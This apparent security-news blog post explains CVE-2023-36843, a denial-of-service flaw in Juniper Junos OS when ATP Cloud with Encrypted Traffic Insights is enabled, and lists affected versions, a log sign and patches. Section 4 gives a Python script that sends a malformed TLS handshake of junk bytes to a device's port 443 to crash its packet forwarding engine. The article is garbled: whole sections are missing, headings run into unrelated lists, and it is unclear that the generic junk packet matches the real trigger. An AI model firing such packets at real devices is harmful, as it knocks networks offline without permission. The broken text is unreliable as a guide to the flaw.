CVE CyberSecurity Database News

CVE-2023-36843 - Breaking Down Juniper Junos OS ATP Cloud Denial of Service Vulnerability

Poster -

---

Summary:
A critical security vulnerability—CVE-2023-36843—has been identified in Juniper Networks' Junos OS. This flaw allows an unauthenticated attacker to crash a device’s Packet Forwarding Engine (PFE), leading to a full denial of service (DoS). The vulnerability leverages improper handling of certain malformed SSL packets, specifically when Advanced Threat Prevention (ATP) Cloud with Encrypted Traffic Insights (ETI) is enabled.

In this article, we'll walk through how this bug works, who is affected, what the impact is, and the steps to test or mitigate it. We’ll use plain English and real code snippets so you can grasp the details, even if you’re not a seasoned security pro.

1. What Is CVE-2023-36843?

The vulnerability is due to "Improper Handling of Inconsistent Special Elements" in the JSF module of Junos OS. When Juniper devices enabled for ATP Cloud with ETI receive specifically crafted, malformed SSL traffic, the PFE module can crash, requiring a manual reboot.

Why is this serious?

21.1: All versions 21.1R1 and up

- 21.2 / 21.3 / 21.4 / 22.1 / 22.2 / 22.3 / 22.4: Versions prior to recent "S" maintenance updates
- See the full advisory version list here (Juniper JSAs).

- They must have ATP Cloud enabled with Encrypted Traffic Insights (ETI) using security-metadata-streaming policy.

3. How Does the Exploit Work?

The core issue is that the Junos OS PFE crashes when it processes malformed SSL traffic under ATP Cloud + ETI.

4. Simulated Exploit Example

*Below is a basic Python example to send intentionally corrupted SSL handshake packets to a target device—the goal here is to highlight how trivial it is to disrupt if the service is exposed.*

import socket

target_ip = "10...1"  # Junos device IP
target_port = 443        # SSL port

# Malformed SSL ClientHello (truncated/invalid)
malformed_ssl_packet = b"\x16\x03\x01\x00\x10" + b"junkjunkjunkjunk"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(malformed_ssl_packet)
s.close()

print("Malformed SSL packet sent. If device is vulnerable, it may now crash the PFE.")

DISCLAIMER:
This is for educational use only. Do *not* attack any device you don't own or have explicit permission to test.

- System logs (use show log messages) may show PFE errors or restarts like

fpc PFE: FATAL ERROR -- Unrecoverable error in pfe

Use Access Control Lists (ACLs) to block incoming unneeded SSL traffic at the network edge.

Patch ASAP:

22.4R2-S1 or 22.4R3 or newer

> *See JSA76356 for official patches and more info.*

7. Learn More & References

- Juniper Security Advisory for CVE-2023-36843 (JSA76356)
- NIST CVE Entry
- Juniper ATP Cloud Product Overview

8. Conclusion

CVE-2023-36843 is a real-world, exploitable weakness that can take entire Juniper networks offline using only unauthenticated, malformed SSL packets. If you rely on Juniper ATP Cloud with ETI, patch or mitigate now. Attackers don’t need your passwords—just the right packet.

Use defense-in-depth

*Questions? Comments? Join the discussion or check out Juniper’s support for guidance.*


*Feel free to share this guide with your IT and security teams so nobody gets caught off guard by CVE-2023-36843!*

Timeline

Published on: 10/12/2023 23:15:11 UTC
Last modified on: 10/17/2023 15:58:59 UTC